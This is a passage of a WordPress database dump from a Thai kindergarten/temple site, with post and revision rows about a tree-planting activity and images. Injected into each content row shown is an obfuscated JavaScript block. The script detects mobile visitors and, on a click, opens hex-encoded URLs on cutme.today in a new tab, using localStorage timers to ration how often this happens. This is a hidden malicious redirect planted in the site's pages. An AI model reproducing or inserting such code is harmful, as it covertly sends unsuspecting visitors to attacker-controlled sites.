wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:20:44','2024-08-30 03:20:44','',19,'http://watprato.ssk.in.th/?p=304',0,'revision','',0),
(306,2,'2024-08-30 10:28:56','2024-08-30 03:28:56','<!-- wp:generateblocks/container {\"uniqueId\":\"942fbcb5\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":319,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-1-724x1024.jpg\" alt=\"\" class=\"wp-image-319\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโตร่วมใจปลูกต้นไม้ กิจกรรมเฉลิมพระเกียรติ','','publish','open','open','','306','','','2024-08-30 10:42:41','2024-08-30 03:42:41','',0,'http://watprato.ssk.in.th/?p=306',0,'post','',0),
(308,2,'2024-08-30 10:28:56','2024-08-30 03:28:56','<!-- wp:image {\"id\":307,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/messageImage_1724923827910.jpg\" alt=\"\" class=\"wp-image-307\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 